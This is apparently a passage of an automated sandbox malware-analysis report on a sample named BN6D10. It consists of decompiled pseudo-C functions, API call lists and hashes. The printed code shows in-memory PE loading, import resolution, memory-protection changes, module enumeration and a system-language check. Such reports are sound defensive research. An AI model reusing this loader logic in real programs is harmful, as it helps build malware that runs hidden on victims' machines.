                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?,00000001), ref: 00401CE7
                                                                                                                                        • TlsGetValue.KERNEL32(?), ref: 00401D09
                                                                                                                                        • TlsSetValue.KERNEL32(?,00000000,?,00000000), ref: 00401D21
                                                                                                                                          • Part of subcall function 00401226: EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000,00401D1A,?,00000000), ref: 0040123E
                                                                                                                                          • Part of subcall function 00401226: VirtualProtect.KERNELBASE(00000000,00000001,0000000C,0000000C,00000000,?,?,?,?,00000000,00401D1A,?,00000000), ref: 00401281
                                                                                                                                          • Part of subcall function 00401226: GetLastError.KERNEL32(?,?,?,?,00000000,00401D1A,?,00000000), ref: 0040128B
                                                                                                                                          • Part of subcall function 00401226: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,?,00000000,00401D1A,?,00000000), ref: 004012B9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3047629960-0
                                                                                                                                        • Opcode ID: 932defbe4dfdb6a023698938e52c3090d4f8813e82115b7a34d37f4d2a217706
                                                                                                                                        • Instruction ID: 7730d4b12e8f039a8e8941a3efe4d29886179ec9aa220dad361151113ab7cf3e
                                                                                                                                        • Opcode Fuzzy Hash: 932defbe4dfdb6a023698938e52c3090d4f8813e82115b7a34d37f4d2a217706
                                                                                                                                        • Instruction Fuzzy Hash: 3D01F132300008ABE6208F14DE44E2BBBADEF69315F21017AF641F32B1C73AEC408628
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.34%

                                                                                                                                        Function 00401F8C, Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 182 401f8c-401fc3 memcpy 183 401fc5-401fd0 182->183 184 401ffc-40200a call 401b32 182->184 185 401fd3-401fdc 183->185 188 401ff4-401ffa 185->188 189 401fde-401ff1 memcpy 185->189 188->184 188->185 189->188
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E00401F8C(void* __ecx, void* _a4, void* _a8) {
				signed int _v8;
				void* _t25;
				int _t33;
				signed int _t40;
				signed int _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t52;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t47 = _a8;
				_t25 =  *((intOrPtr*)(_t47 + 0x3c)) + _t47;
				_t40 =  *(_t25 + 6) & 0x0000ffff;
				_t49 =  *((intOrPtr*)(_t25 + 0x3c));
				_t52 = ( *(_t25 + 0x14) & 0x0000ffff) + _t25 + 0x18;
				_v8 = _t40;
				memcpy(_a4, _t47,  *(_t25 + 0x54)); // executed
				_t56 = _t55 + 0xc;
				if(_t40 > 0) {
					_t43 =  !(_t49 - 1);
					_t54 = _t52 + 0x14;
					do {
						_t33 =  *((intOrPtr*)(_t54 - 4)) + _t49 - 0x00000001 & _t43;
						if(_t33 != 0) {
							memcpy( *((intOrPtr*)(_t54 - 8)) + _a4,  *_t54 + _a8, _t33); // executed
							_t56 = _t56 + 0xc;
						}
						_t54 = _t54 + 0x28;
						_t21 =  &_v8;
						 *_t21 = _v8 - 1;
					} while ( *_t21 != 0);
				}
				E00401B32(_a4);
				return 0;
			}














                                                                                                                                        0x00401f90
                                                                                                                                        0x00401f96
                                                                                                                                        0x00401f9d
                                                                                                                                        0x00401fa3
                                                                                                                                        0x00401fa6
                                                                                                                                        0x00401fb6
                                                                                                                                        0x00401fb9
                                                                                                                                        0x00401fbe
                                                                                                                                        0x00401fc3
                                                                                                                                        0x00401fcb
                                                                                                                                        0x00401fcd
                                                                                                                                        0x00401fd3
                                                                                                                                        0x00401fda
                                                                                                                                        0x00401fdc
                                                                                                                                        0x00401fec
                                                                                                                                        0x00401ff1
                                                                                                                                        0x00401ff1
                                                                                                                                        0x00401ff4
                                                                                                                                        0x00401ff7
                                                                                                                                        0x00401ff7
                                                                                                                                        0x00401ff7
                                                                                                                                        0x00401fd3
                                                                                                                                        0x00401fff
                                                                                                                                        0x0040200a

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(00000000,00000002,?,00000002,?,?,?,?,00401C57,?,?,?,?,?,00000002,00000000), ref: 00401FB9
                                                                                                                                        • memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 00401FEC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                        • Opcode ID: 26c2a0c01562fe0999569659decf58a21fda16f2b5e82da7da097808fe419233
                                                                                                                                        • Instruction ID: 34ba3f68961694401ee60be4d945655729f24ebafdbe90f0a81fe01ff034e333
                                                                                                                                        • Opcode Fuzzy Hash: 26c2a0c01562fe0999569659decf58a21fda16f2b5e82da7da097808fe419233
                                                                                                                                        • Instruction Fuzzy Hash: 6411657650010AAFCB10DF59CC81DAAB7F8FF04314705806AF90897322D379EA55DB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 0040212A, Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 190 40212a-40214d call 401504 193 4021a1-4021a6 190->193 194 40214f-402152 190->194 195 402154-402169 call 401030 194->195 196 40216b 194->196 197 40216d-40216f 195->197 196->197 199 402190-40219b HeapFree 197->199 200 402171-402189 call 401676 StrStrIA 197->200 199->193 200->199 204 40218b 200->204 204->199
                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                        			E0040212A(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E00401504( &_v8,  &_v12,  *0x404100 ^ 0xa49b9761) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E00401030(_t22, _v8,  *0x404100 ^ 0xd3bf9dd7);
					}
					if(_t29 != 0) {
						_v12 = E00401676(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x4040e0, 0, _v8);
				}
				return _t25;
			}








                                                                                                                                        0x0040212a
                                                                                                                                        0x0040212d
                                                                                                                                        0x0040212e
                                                                                                                                        0x00402144
                                                                                                                                        0x0040214d
                                                                                                                                        0x00402152
                                                                                                                                        0x0040216b
                                                                                                                                        0x00402154
                                                                                                                                        0x00402167
                                                                                                                                        0x00402167
                                                                                                                                        0x0040216f
                                                                                                                                        0x00402179
                                                                                                                                        0x00402181
                                                                                                                                        0x00402189
                                                                                                                                        0x0040218b
                                                                                                                                        0x0040218b
                                                                                                                                        0x00402189
                                                                                                                                        0x0040219b
                                                                                                                                        0x0040219b
                                                                                                                                        0x004021a6

                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.KERNELBASE(00000000,00000000,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 00402181
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 0040219B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: e776918a00ac0aae7ab76bf6413a92192bce559fbea7e8136cda6bef20c6054b
                                                                                                                                        • Instruction ID: 8295fca072fd4b9566d3d3d28dba11e38151ff33bd986980f564396e29b2a5f2
                                                                                                                                        • Opcode Fuzzy Hash: e776918a00ac0aae7ab76bf6413a92192bce559fbea7e8136cda6bef20c6054b
                                                                                                                                        • Instruction Fuzzy Hash: 4101F776A00114BBDB10DBA1EE48EAF7BACAB88740F104177BA01F7290D674CF0187B8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 10.55%

                                                                                                                                        Function 00F664AE, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 205 f664ae-f664c7 206 f664c9-f664cb 205->206 207 f664d2-f664de 206->207 208 f664cd 206->208 210 f664e0-f664e6 207->210 211 f664ee-f664fb Module32First 207->211 208->207 210->211 216 f664e8-f664ec 210->216 212 f66504-f6650c 211->212 213 f664fd-f664fe call f6616d 211->213 217 f66503 213->217 216->206 216->211 217->212
                                                                                                                                        APIs
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00F664F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.705480067.0000000000F65000.00000040.00000001.sdmp, Offset: 00F65000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_f65000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FirstModule32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3757679902-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: f9abb4f261bcd53a4f13cb1a73fe48c8896bc10016870f30f1e591a49ece16cc
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 5BF062359007106BD7206BB5988DA6F76E8AF49734F100529F646D14C0DA74EC455A61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.48%

                                                                                                                                        Function 00401C1F, Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                        			E00401C1F(void* __eax, void* __edx) {
				char _v8;
				void* _v12;
				void* __ebx;
				void* _t17;
				long _t19;
				long _t23;
				long _t25;
				char _t28;
				void* _t31;
				long _t33;
				void* _t35;
				intOrPtr* _t36;
				void* _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E004013AB( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t33 = 8;
					goto L8;
				} else {
					_t28 = _v8;
					_t19 = E00401F8C( &_v8, _t28, _t35); // executed
					_t33 = _t19;
					if(_t33 == 0) {
						_t38 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
						_t23 = E0040200D(_t28, _t38); // executed
						_t33 = _t23;
						if(_t33 == 0) {
							_t25 = E004016D0(_t38, _t31, _t28);
							_t33 = _t25;
							if(_t33 == 0) {
								_push(_t25);
								_push(1);
								_push(_t28);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t28))() == 0) {
									_t33 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					 *((intOrPtr*)(_t36 + 0x18))( *((intOrPtr*)(_t36 + 0x1c))( *_t36));
					E00401F77(_t36);
					L8:
					return _t33;
				}
			}
















                                                                                                                                        0x00401c1f
                                                                                                                                        0x00401c27
                                                                                                                                        0x00401c44
                                                                                                                                        0x00401c4b
                                                                                                                                        0x00401ca9
                                                                                                                                        0x00000000
                                                                                                                                        0x00401c4d
                                                                                                                                        0x00401c4d
                                                                                                                                        0x00401c52
                                                                                                                                        0x00401c57
                                                                                                                                        0x00401c5b
                                                                                                                                        0x00401c60
                                                                                                                                        0x00401c63
                                                                                                                                        0x00401c68
                                                                                                                                        0x00401c6c
                                                                                                                                        0x00401c71
                                                                                                                                        0x00401c76
                                                                                                                                        0x00401c7a
                                                                                                                                        0x00401c7f
                                                                                                                                        0x00401c80
                                                                                                                                        0x00401c84
                                                                                                                                        0x00401c89
                                                                                                                                        0x00401c91
                                                                                                                                        0x00401c91
                                                                                                                                        0x00401c89
                                                                                                                                        0x00401c7a
                                                                                                                                        0x00401c6c
                                                                                                                                        0x00401c93
                                                                                                                                        0x00401c9c
                                                                                                                                        0x00401ca0
                                                                                                                                        0x00401caa
                                                                                                                                        0x00401cb0
                                                                                                                                        0x00401cb0

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004013AB: GetModuleHandleA.KERNELBASE(?,?,00000002,?,?,?,?,?,00401C49,?,?,?,00000002,00000000,?,?), ref: 004013D0
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 004013F2
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 00401408
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 0040141E
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 00401434
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 0040144A
                                                                                                                                          • Part of subcall function 00401F8C: memcpy.NTDLL(00000000,00000002,?,00000002,?,?,?,?,00401C57,?,?,?,?,?,00000002,00000000), ref: 00401FB9
                                                                                                                                          • Part of subcall function 00401F8C: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 00401FEC
                                                                                                                                          • Part of subcall function 0040200D: LoadLibraryA.KERNELBASE(?,?,00000000,?,?,?,00000002), ref: 0040203F
                                                                                                                                          • Part of subcall function 0040200D: lstrlenA.KERNEL32(?), ref: 00402055
                                                                                                                                          • Part of subcall function 0040200D: memset.NTDLL ref: 0040205F
                                                                                                                                          • Part of subcall function 0040200D: GetProcAddress.KERNEL32(?,00000002), ref: 004020C2
                                                                                                                                          • Part of subcall function 0040200D: lstrlenA.KERNEL32(-00000002), ref: 004020D7
                                                                                                                                          • Part of subcall function 0040200D: memset.NTDLL ref: 004020E1
                                                                                                                                          • Part of subcall function 004016D0: VirtualProtect.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,?,00000002), ref: 004016FE
                                                                                                                                          • Part of subcall function 004016D0: VirtualProtect.KERNEL32(00000000,00000000,00000004,?), ref: 00401755
                                                                                                                                          • Part of subcall function 004016D0: GetLastError.KERNEL32(?,?), ref: 0040175B
                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00401C8B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 33504255-0
                                                                                                                                        • Opcode ID: 9536993cfc3ac6a45bae2a745d533d39a1ddd57a0d372dcbed185059d1b13e45
                                                                                                                                        • Instruction ID: 32e589e3f3fa5c28fc9826b282057990af9ed524917f32dd9ef98362c1f9069b
                                                                                                                                        • Opcode Fuzzy Hash: 9536993cfc3ac6a45bae2a745d533d39a1ddd57a0d372dcbed185059d1b13e45
                                                                                                                                        • Instruction Fuzzy Hash: D3112C37940A016BE7219B79CC45EAB73ACAF44354B05013AF901F3391EB78ED0147A8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.02%

                                                                                                                                        Function 00F6616D, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00F661BE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.705480067.0000000000F65000.00000040.00000001.sdmp, Offset: 00F65000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_f65000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: 473ac6174c505e486f61ee6f00830a8cbace2cd2089b8d0b8ae44f1c4cadc9d8
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: A4113C79A00208EFDB01DF98C985E98BBF5AF08750F0580A4F9489B362D775EA50EF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00401676, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E00401676(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA("true", 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





                                                                                                                                        0x0040167a
                                                                                                                                        0x0040168b
                                                                                                                                        0x00401693
                                                                                                                                        0x00401695
                                                                                                                                        0x004016a8
                                                                                                                                        0x004016a8
                                                                                                                                        0x004016b2

                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,0000005A,00000000,00000004,?,?,00402176,?,00000000,?,?,00000000,?,?,?,0040112E), ref: 0040168B
                                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,00402176,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 00401695
                                                                                                                                        • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,00402176,?,00000000,?,?,00000000,?,?,?,0040112E), ref: 004016A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3724080410-0
                                                                                                                                        • Opcode ID: 7f8bc06977c5fb231e505e3596aed4ef3a2c7d4493f4dcf66c3d5f64dfdeb59b
                                                                                                                                        • Instruction ID: e67426800cb1804ef177786c223d77e39d168568acbb21d6da087c10dd334db1
                                                                                                                                        • Opcode Fuzzy Hash: 7f8bc06977c5fb231e505e3596aed4ef3a2c7d4493f4dcf66c3d5f64dfdeb59b
                                                                                                                                        • Instruction Fuzzy Hash: 39E0B864641205B7E710DB91DD06F7976AC974074AF500055B741F60D0D6789F04AA79
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 6.84%

                                                                                                                                        Function 00F65D8B, Relevance: .1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.705480067.0000000000F65000.00000040.00000001.sdmp, Offset: 00F65000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_f65000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction ID: 70161af733ca9e94b16308ee142ed7a0144659667cbd030581384b4a18330694
                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction Fuzzy Hash: FE11CE72340500AFDB40CF55DC81FA673EAEB88730B298065ED08CB346D67AEC01C7A0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Function 004019A8, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                        			E004019A8(void* __esi) {
				intOrPtr _t9;
				long _t10;
				intOrPtr _t12;
				intOrPtr* _t19;
				intOrPtr* _t20;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				struct _CRITICAL_SECTION* _t25;
				void* _t26;

				_t22 = __esi;
				_t25 =  *(_t26 + 0xc);
				_t9 =  *((intOrPtr*)(_t25 + 0x20));
				if(_t9 != 0) {
					__imp__RemoveVectoredExceptionHandler(_t9);
				}
				_t10 =  *(_t25 + 0x24);
				if(_t10 != 0) {
					TlsFree(_t10);
				}
				if( *_t25 != 0) {
					DeleteCriticalSection(_t25);
				}
				_t19 = _t25 + 0x18;
				_t21 =  *_t19;
				if(_t21 != _t19) {
					_push(_t22);
					do {
						_t23 = _t21;
						_t12 =  *_t23;
						_t20 =  *((intOrPtr*)(_t23 + 4));
						_t21 =  *_t21;
						 *_t20 = _t12;
						 *((intOrPtr*)(_t12 + 4)) = _t20;
						_t7 = _t23 + 0xc; // 0xc
						VirtualProtect( *(_t23 + 8) << 0xc, 1,  *_t7, _t7);
						E00401F77(_t23);
					} while (_t21 != _t19);
				}
				return E00401F77(_t25);
			}













                                                                                                                                        0x004019a8
                                                                                                                                        0x004019aa
                                                                                                                                        0x004019ae
                                                                                                                                        0x004019b4
                                                                                                                                        0x004019b7
                                                                                                                                        0x004019b7
                                                                                                                                        0x004019bd
                                                                                                                                        0x004019c2
                                                                                                                                        0x004019c5
                                                                                                                                        0x004019c5
                                                                                                                                        0x004019cf
                                                                                                                                        0x004019d2
                                                                                                                                        0x004019d2
                                                                                                                                        0x004019d8
                                                                                                                                        0x004019db
                                                                                                                                        0x004019df
                                                                                                                                        0x004019e1
                                                                                                                                        0x004019e2
                                                                                                                                        0x004019e2
                                                                                                                                        0x004019e4
                                                                                                                                        0x004019e6
                                                                                                                                        0x004019e9
                                                                                                                                        0x004019eb
                                                                                                                                        0x004019ed
                                                                                                                                        0x004019f0
                                                                                                                                        0x004019ff
                                                                                                                                        0x00401a06
                                                                                                                                        0x00401a0b
                                                                                                                                        0x00401a0f
                                                                                                                                        0x00401a19

                                                                                                                                        APIs
                                                                                                                                        • RemoveVectoredExceptionHandler.KERNEL32(?,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000,?,?,?,0040111D), ref: 004019B7
                                                                                                                                        • TlsFree.KERNEL32(?,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000,?,?,?,0040111D), ref: 004019C5
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000,?,?,?,0040111D), ref: 004019D2
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000001,0000000C,0000000C,00000000,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000), ref: 004019FF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalDeleteExceptionFreeHandlerProtectRemoveSectionVectoredVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2089334682-0
                                                                                                                                        • Opcode ID: e95bd8cd7627fb4772f1c790d46f7e17e2829583be7f5a481fa77397a176779f
                                                                                                                                        • Instruction ID: 9c331b9d05177dc367753e723a0966a416fc2945be1df10d8dc1b2f8949edb71
                                                                                                                                        • Opcode Fuzzy Hash: e95bd8cd7627fb4772f1c790d46f7e17e2829583be7f5a481fa77397a176779f
                                                                                                                                        • Instruction Fuzzy Hash: D5015AB62012059FDB10DF59C988E9BBBEDEF48315B00852AF956E3361C739ED40CB68
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.12%

                                                                                                                                        Function 00401498, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E00401498() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x4040f0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4040fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x4040ec = _t3;
					_t5 = GetCurrentProcessId();
					 *0x4040e8 = _t5;
					 *0x4040f0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x4040e4 = _t6;
					if(_t6 == 0) {
						 *0x4040e4 =  *0x4040e4 | 0xffffffff;
					}
					return 0;
				}
			}









                                                                                                                                        0x00401499
                                                                                                                                        0x004014a7
                                                                                                                                        0x004014af
                                                                                                                                        0x004014b4
                                                                                                                                        0x004014fe
                                                                                                                                        0x004014fe
                                                                                                                                        0x004014b6
                                                                                                                                        0x004014be
                                                                                                                                        0x004014fa
                                                                                                                                        0x004014fc
                                                                                                                                        0x004014c0
                                                                                                                                        0x004014c0
                                                                                                                                        0x004014c5
                                                                                                                                        0x004014d3
                                                                                                                                        0x004014d8
                                                                                                                                        0x004014de
                                                                                                                                        0x004014e6
                                                                                                                                        0x004014eb
                                                                                                                                        0x004014ed
                                                                                                                                        0x004014ed
                                                                                                                                        0x004014f7
                                                                                                                                        0x004014f7

                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040110A,?,00000000), ref: 004014A7
                                                                                                                                        • GetVersion.KERNEL32(?,00000000), ref: 004014B6
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000), ref: 004014C5
                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 004014DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 845504543-0
                                                                                                                                        • Opcode ID: 27347b2bcbe02785c06f53e7a36b259eb5b24c1bed5be72ecca43f3280b5045c
                                                                                                                                        • Instruction ID: 7a34177cdbe4c5a1a16b5891b0a7db50f8ca6654758967224806bdb55014125b
                                                                                                                                        • Opcode Fuzzy Hash: 27347b2bcbe02785c06f53e7a36b259eb5b24c1bed5be72ecca43f3280b5045c
                                                                                                                                        • Instruction Fuzzy Hash: EEF090B1A452019FE710DF69BE09B853FA8B344712F14803AF315F52F4D3B056419B6C
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.16%